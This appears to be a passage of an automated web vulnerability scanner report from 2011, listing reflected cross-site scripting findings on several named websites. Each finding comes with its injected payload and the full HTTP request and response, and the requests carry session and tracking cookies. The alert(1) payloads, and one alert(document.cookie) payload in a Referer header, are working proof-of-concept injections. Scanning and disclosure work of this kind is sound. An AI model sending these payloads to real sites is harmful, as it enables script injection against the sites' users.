Set-Cookie: bkou=KJhMRsOQRsn/pgOCuWkvuDT0BDTp1MDlLpxlufWy1WLh1fs61nz61E90uDLtOL3j3PL783xVkVQRSrggJhrSJj+RJ3VZVjGISQMNOHgWy1Sxka6zEylE9aj8va9=; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkp1=KJhMRZOQ19niHytCFGy199y79MG=; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJ0P6NN/DtWROdedp+H+jk7BYpdYuLox12WttNprlEJ+SV1r7/aWkJYG854Xra9GWfDgn2J90GaYOH3hynE9hefG/GyiMexHP+AYxfgG/ignb7lwb5QXnkyceQIell7twXdp7Cxk/W1S9eV2j8L5PAir1eeH3Qvtfn3odo7/43kYQqarTJOXMpD8S2wXqcG6WKLMsSY9wOPTTbAoXuE8Igrz4hX1adD+s4FMC8/eXusRoJaFpEAEhQw0Yihud0pd431ih55fwtEb2V+QNQeHHJkDh4LaIFSVBZeTG2lbRIeECnUTmOsgMVwKEUtar3f9AigB/dVLwTzjnPOA0x6o8Elkt9YCdXvjX+sbgk/iPMo9Z72pm393ZNj85FFb0vQXbIKj3UmNmSNWgnx8aH+NxaBz5LtAH+hFVjiyUtZKvrgeDDS2tVcq5AWgwxIY005ijPTBndDEwEasN8nFMwilMX962RVMzKc2V+dXqwT8tIr80XoEhweSN+a5buua4wT1w4eQ3N6NrYJwurDPtViyATyzemmupM4ywQCZb++S8LoFSXP2UuLV8k76bLVbL2jt6CECwFYtXKv4dAq3YdqNZJTL0dmn8ocm7IVU/8Eb3fN8ohB6T7fBpz9UwdL5TUt29Ki45G5ZbbE7H234KuP33DI151Htb9nfcQKBynr7TfRrFVdIkTSLoUAvKSgJRqep+AMffft6zIFNEm7XoU7bmmS2+wdHfb3vC6Rhp8Hs+ZpII3cceVm2M4yX8HQiQmFs+h1sy7pxVievJDBNLsNadCCIdr03KlTFNFy4U+TIcJEeKpYdRpV4jrKmlEsh+tc2mpUYd8yzVmt8bBymiX4AdpFTrtztodDTRQS14uVbKH1AIhnwwlB9wcVv2dn1ltfgUDQ=; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 12-Feb-2011 18:33:06 GMT; path=/; domain=.bluekai.com
BK-Server: 7b05
Content-Length: 803
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=ebayus_cs=1&betq=7847=399109" width=1 height=1 border=0 alt="">
<img sr
...[SNIP]...
<script>var referrer='http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=200565765597&_trksid=%20p2041474.m622&_trkparms=clkid%3D7016594469467627520'; var hashID='dbdcb53f2576976d806d6498794024fc353f6';alert(1)//c16c49bef95'; var taxonomyJSON=[[27651,5540,5266,3177,19,3],[79063,6463]];</script>
...[SNIP]...
1.120. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c78a6<script>alert(1)</script>c0a5c709b0 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html%3Ftk%3Dhp_fvc78a6<script>alert(1)</script>c0a5c709b0 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fv
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Fri, 11 Feb 2011 19:29:38 GMT
Via: NS-CACHE: 100
Etag: "6907248ba8c229d7c8a253fd71e5626f06790e77"
Content-Length: 202
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Fri, 11 Feb 2011 19:39:37 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fvc78a6<script>alert(1)</script>c0a5c709b0", "diggs": 0});
1.121. http://www.floristexpress.net/ [refcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /

Issue detail

The value of the refcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b295e"%3balert(1)//b7f69ae6950 was submitted in the refcode parameter. This input was echoed as b295e";alert(1)//b7f69ae6950 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?refcode=ORDb295e"%3balert(1)//b7f69ae6950&RefPage=pfc_PRODUCT-30050119 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\%22%3balert(document.cookie)//5e820bfb5e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IZJPJPS192.168.100.163CKOWO; path=/
Date: Fri, 11 Feb 2011 18:54:01 GMT
Server: Apache
Set-Cookie: PHPSESSID=f5bd434039a4b158c8c4c53fc2d56586; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=a4f657633e93d2b0ff275b5f8026f4ac; path=/
Set-Cookie: ref_code=ORDB295E%22%3BALERT%281%29%2F%2FB7F69AE6950; path=/
Content-Type: text/html
Content-Length: 102831

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="10:30AM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="B";
s.eVar36="ORDB295E";ALERT(1)//B7F69AE6950";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...
1.122. http://www.pcworld.com/search.html [qt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /search.html

Issue detail

The value of the qt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e12b4</script><script>alert(1)</script>0a7e49333ec was submitted in the qt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.html?qt=web+servicese12b4</script><script>alert(1)</script>0a7e49333ec&s=d&tk=srch_art_tag HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205278865.1667652152.1297452630.1297452630.1297452630.1; __utmb=205278865; __utmc=205278865; __utmz=205278865.1297452630.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); pcw.last_uri=/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html%3Ftk%253Dhp_fv; base_domain_75ac625a0a0b5cc6896b2ab1e1f9b3a7=pcworld.com; fbsetting_75ac625a0a0b5cc6896b2ab1e1f9b3a7=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; fbGauntlet=%7B%22fbconnected%22%3A%22false%22%2C%22count%22%3A0%2C%22fbname%22%3A%22%22%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26AAC70A051D1371-4000012F6001C3F0[CE]; foresee.session={"pv":1,"paused":"0","timeout":3,"start":1297452643608,"rid":"1297452643610_770588","current":"http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html","site":"pcworld","lc":{"browse":1},"ls":{"browse":false},"ec":{"browse":0},"sd":{"idx":0,"name":"browse","section":""}}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 11 Feb 2011 19:30:51 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=B7D2CCE5B51EFE148748478AD76F41CA; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 11 Feb 2011 19:30:51 GMT
Connection: close
Vary: Accept-Encoding


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
;
s.prop21="";
s.prop22="";
s.prop23="";
s.prop24="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28=s.getQueryParam('tk') ? "tokens:"+s.getQueryParam('tk') : "";
s.prop29="general search:web servicese12b4</script><script>alert(1)</script>0a7e49333ec";
s.prop30="";
s.prop31="";
s.prop32="";
s.prop33="";
s.prop34="";
s.prop37="search:catchall2other:catchall2other";
s.prop38="";
s.prop39="";
s.prop40="";
/* Conversion Variables */
s.campaign=s.getQu
...[SNIP]...
1.123. http://www.pcworld.com/search.html [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /search.html

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e10"><script>alert(1)</script>c5908e4ca6f was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.html?qt=web+services&s=d72e10"><script>alert(1)</script>c5908e4ca6f&tk=srch_art_tag HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205278865.1667652152.1297452630.1297452630.1297452630.1; __utmb=205278865; __utmc=205278865; __utmz=205278865.1297452630.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); pcw.last_uri=/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html%3Ftk%253Dhp_fv; base_domain_75ac625a0a0b5cc6896b2ab1e1f9b3a7=pcworld.com; fbsetting_75ac625a0a0b5cc6896b2ab1e1f9b3a7=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; fbGauntlet=%7B%22fbconnected%22%3A%22false%22%2C%22count%22%3A0%2C%22fbname%22%3A%22%22%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26AAC70A051D1371-4000012F6001C3F0[CE]; foresee.session={"pv":1,"paused":"0","timeout":3,"start":1297452643608,"rid":"1297452643610_770588","current":"http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html","site":"pcworld","lc":{"browse":1},"ls":{"browse":false},"ec":{"browse":0},"sd":{"idx":0,"name":"browse","section":""}}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 11 Feb 2011 19:31:15 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=5002CB634254BF4419DA47B1409E27C3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 11 Feb 2011 19:31:15 GMT
Connection: close
Vary: Accept-Encoding


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<a href="/search.html?qt=web+services&amp;s=d72e10"><script>alert(1)</script>c5908e4ca6f" class="selected">
...[SNIP]...
1.124. http://tags.bluekai.com/site/50 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/50

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 243c4'-alert(1)-'d364363071b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=243c4'-alert(1)-'d364363071b
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJpE8VaQtwGt6JKHRxRlMYUehXOxymGwj1kYVzy1cny1eOvulA9hDSeRPV+7/WLPvwqdoutxBRZBQKWJA1UsT16n1RVJxRTw/Lq/z9zrJQADu2UU9GGO9BVGsj1=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqEpyKodzE/yKnx01sh2sIMfjIUcuf8JY4RytoXJocT5DctrzWZ/C0sbK2ePQXh7RgC+0L9x8KcakQaVeNEm/1Q9142UU5SKALAj2M9Ss/O92Xrq1EOyj+fAFsK1ga8Y6+FlbIlgMzPrn4RysZQTD/VxOxBe+jJgTxoEjwDQdf3okMnBTLit+ffFlpL2gXQIevpK0ovOTKYwx18+oieUQ40fB/AOEO+Px+yP5K10UfNFZltN0eglCNPEGwgLQwoY7sRf7WSh8pdxc7Hd89wP1pBy95DFZKI5GtAOLQzDEGTBes9bojZOTErVXBGaNk53pzYyTrRbnkzn2wC9+yKA7GmCsvCKu0JDqg/kLgrrVMFedxXhFX9Ii9cAAg292ERp5HHUtSvcafg8Y8C9bodR1EeWdmq1+qRc3V4CjVYx71w/D1e3fXr9O3EOTxxYJH4t0pZuGJb8qurnsNQ296i2micNHGa1z5L5xvTeZEdJOsJwbAoYI3uXKM69XKMhg9==; bklc=4d55308f; bk=yQSpJZmZF9ysHNJo; bkc=KJh5NP+/asWD9m9pK2w55z7yxq5kYXJqAZD3VakKDFOuZ67KWSNyaTBWnSiAF/u/kWoCxQd5/R1/BJ9GLGH1GG59Y/EYY//GCRo/0FOOmt5tdoA8dXwmXrtz1dd+pakda/eco6YG+MvQ9/94fjjzqyw59hS9wj69SNVs1Nv8vNlzkYIziJXzpaX0rzgaUuZjXGDc/XnKZZTT+TWfEfvd6lOUJ/92VRaBJd1e5iiL/e23OKRh0EuKXWBUtJ4EyLXMjd5hE6yRc7/9MBECdCDKekQ6clHp3drgKzDJT1n24d0MU167aIwppubx7BfOwU31rbvOm24nfRFkd+qBwHfAoFAv+IeatGmdJKpcIz4T0cH4KOG2FQsQflhry9jFe8ecJamXXWRwxWtY9AIfXlYdqxUAfNQWjkmXXOSLp6rBYkCV0+E8AJ+2lYcJkYXziKF8CwF8L2gyC5wzwj/oU2isXyA2DveBqMQGrDZ02yql0IFzy87zcIv8X0XY1XNcKOFVlpbXcp/8UfJSq8GcLHSU/CuR4HlxdPL0hxLlR8WroQezwZPTxEnaY8dxpFKZ8i5tQvkS4WdmkVO2U/AZ6d+QBLDnlX42ELnlBlbCamFebuO4fK9KkAp8yAKNXPK4oVs2EnSEqy6R7LETsz0wXNv2mGeXuMnkYX2Mw8C+Ol9rkbgg/q2o8SjTTHazZ0BuQzyaybAfQJ7iCSKNXp7pl7YmZp+3tgYEpgKcrbZUKI3STK5GsIqw70lHlqIjZXRUo7pbfGXgDClW0ICbl1mi9+llJamIXOeVjp7Vz0ntp0i/PHNvTvjTTPazbtfzgfUaFVGIKS5A242W16TwV+a4EeTrrPT0Ek5lYm++gCgQlz55rr1XlJxFf1cILH3+yWhlkr8kOp4aYN5QwSu6RJdL1oyLZKva3fE8kZ7rNLjFLhorkw0Fh7Y+BHydSzAvV1sir+4w4uKeIbfArAHa20I+cM8qyLX7clJpVd2yetndWab775KX0SDjladdzL5QFhRsgEbYtNB6DpXpKyffG2AFWgZ2u5pjK5paAFNcewXchwiH2x==; bkst=KJhkAnNv96WDCxzBYYqOyk/DYyLnPIq7p+0jxixZSXyZi6Q6DjrxpHoJk/6sTb3BMSt5gteoWtQkwGYkRsV77VIQLNLJlrg07U18C8LCE8wWpF+ahzIxjfLFWv8NV0+xMQAj5ue9y9kWtcUY+QRCOOgEh4MBLd8Ub8XQGIQGsLHHqHy+IgjGZQ9aTWoEek/pQ6oydEsV0awjBYl5dK04bXzDl4hc5hqBWfX6G1KBJ7MPA323y6S840qweb35653sWAapYpbEwF4Vm6mvOq4rrANdXXugRgZNcD4fkXmTTQpgXwmNRZl8UBGHaxUeMEszYD6jYFa07uEmogJCkWFvrWODisi6W5t2cuFw8x7JAzBN+IB57HqfrN8diu4XNFJaWF4YkLwLApuP/WDnxZe/mE4/QpRLtf2v3RNK4RQndi28rkgN; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 11 Feb 2011 18:33:12 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=PbEVTB7F/B6sHNJo; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5NV+/PWWDOdOp524NLD3sAB30OSsgujSoRsU8u1kcquq8HgEYUxyu+SYuXCWiDi3aYUlGeukWG/aWAuPAW76/CW9GMYY/V3WiAMnXAJNp2Xfmw4BC5dl+7M1p5IfdMrA9AmEDyB2Eb5cyflHXgPmzsyd1R8czIhpzCRggq5yhys6NtRPMHIcXFkooCt/SElM99gYfWtYNuMGMkqL0QoFbC5lT0LcIJjmg/gQgaPmdXsOGyaFuoU1qrw1Drp3krX/9xo/NtcQ0lh1YCHUACbl9wvbR8CBIWOcy8qE9KmELwrfJuKACmXO/cK84TVswh4OOOfKIFTjUyQWizwX44udUIX7amnfjORgEmfCcMlaUBcOEFLhth7JdfKSKXcnEKGPqX1lSQ2XkfL4NhpMJ2nFyecoiwDe4IP0we5Tz//Xgo7gCePW9BRASwm7mydttajYdRxM1o7gCpjMwuT6SVaqv2wVxZ8lzwLUDnh0sNd1H2dBc+4ua62y2i3k4t/qgX5lUGYNWt3rTuUcXeKTUNfZc1f74Jle7UyHZVGdyPLp4UFp5jlvIRMNFCQzhi6rCsL02XQE2upcPYp5MuO5E9sb4AFRgo7gCWXq2FV7TzxM95Y6IJI5v1O2UGL76wJCB2zJMrB2JIwyZIWLhcIatX+DmfZcaNY2XNJMdl216p1+Dmd7VQwxDNL2i4NyX85Dm8JKv3P2T9zIerUS9XmPudUg/gNr83P8TOvdBc3jOokXb5ELyDflyMcadpg0Ep7ayHX8/C2w2fKarbrVKFiq2esledGVpJDclqIvZIRVo7pffTTo6Kda+5YlrRPaO6wzDDfdyWmSpcwwLhF1pWZJNIhv83P8Tav2NaIfUbr/KFjIXxfcIdXxynQ2S6j2Bw3bTUMWrBtQ48ZtIsre+C8NOh6PhDf2yaJT4db/NZmlmY7gjpAlNyCVRC8xVwYKfoJ1PDfNykqcK1Lw5hFh+PrkshU2gosr+Q4Gou8qcYCq5Fufrmh7z5hUUrqVQ4ho8IsxJMWXI8mYtdrRKhwBeK/NhFhj1nLlQdFvcmyqwStWyXrc5kC/67V5ZpIw8SwjpBl5XW75tc7KhR+zHb4Il6viF; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJhn8sPQKBWxbLFWT19WREW04muaLKb0yaM3zea5cQSsgVXeQSyjleYVBNuVZKWmn6u1iDssMTsCQBD4vYLnjEWpz9OkJuu2QVvixnsgNL89kioxfw2nV0OgWCLeyh1QiTNOMQdYRZuxOnJu2qV9n9Yp/0jj; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsn/pkOQuWkvuDT0BDTp1MDlLpxlufWy1WLh1fs61nz61E90uD+I6He3YNE1y1Sxka6zEbym9WSLsJQ=; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkp1=KJhMRZOQ19niaytCFGy199hn9A9=; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpE8tOQRsxyRZOQW9qiaytCFQhGQ/zOovvaATWCXbO1rRATi1zaaOmW3F20IloMLPrJ4qU/mFKcPuUtFWOhaGq+zQy1I+fwfw8oQ5Hp9MULZXf9T1BLf3FgnwwbAjZDwRyIyLM9y1f9q1M9XmOKR5G2qVENr8Zy3t5kZ9BDltEkGgjakhMNq9pUQafzdvJ/XhHHb+AjdQnP7yLTD1VrMbpI0D+qgm38sHhBsOiAfeZ6XXc34yae0bmPQVcgt6e4w0LdUFJBugYc6481/wUgQmopCD+Yw9pHlRmrcZxIWXB+DySsv9XF+Qhe8w9cZ4IgnZ+w0Kx1KhQBeWYQIIUBsOQT1t20lMBsPiXCbKlfaHh4n4RysZQTD/VxOxBe+jJgTDHE2wx9zDK9wRpmjyvj2xuGFFHpErQvDtEpxKcMokgvB/LMt2fbF7dF2nyiIpYyIPSVe9yc4yH0qL/y48z7e8BtK8A2M9SojtjyOv3dFX3NqJLone0UJAcXslUM1kI2qhL6FDtOZZXcPOdiBBFCB/ofdQw5QhTIIVeprRe3kXplp+s6Q/VdRy1eylzLTqXngnfDZGaChzNNUvTVbwsnqM8/wx5e1PY2kAuGUvXaz4kgAh6eQdzc++eJkLMrFtg+e92wicLvf/1Rxm7Cn2OXZ8Abi3+L6z14lE6nZWe37yeBMd7BZV++eNnw9L0AA71RsxoRdEcz/y6mEh9GrqO4poWW2zh+VN7zymGjxmgPYSAlYZuvSlK9CxXpMFxtObpIOPO5iBbWssnPFyu3IfnG5zPtO8eFxKb4j9nhHIovxrbuXrgNrm49QOj4Lwx9YAXsC7OcOGjFCdqZ99YGGDbF; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 12-Feb-2011 18:33:12 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 737
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1068244&t=2" width=1 height=1 border=0 alt="">
<img src="http://leadback.advertising.com/adcedge/lb?si
...[SNIP]...
<script>var referrer='http://www.google.com/search?hl=en&q=243c4'-alert(1)-'d364363071b'; var hashID='dbdcb53f2576976d806d6498794024fc'; var taxonomyJSON=[];</script>
...[SNIP]...
1.125. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ef4</script><script>alert(1)</script>fc8f59adbce was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f48ef4</script><script>alert(1)</script>fc8f59adbce; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
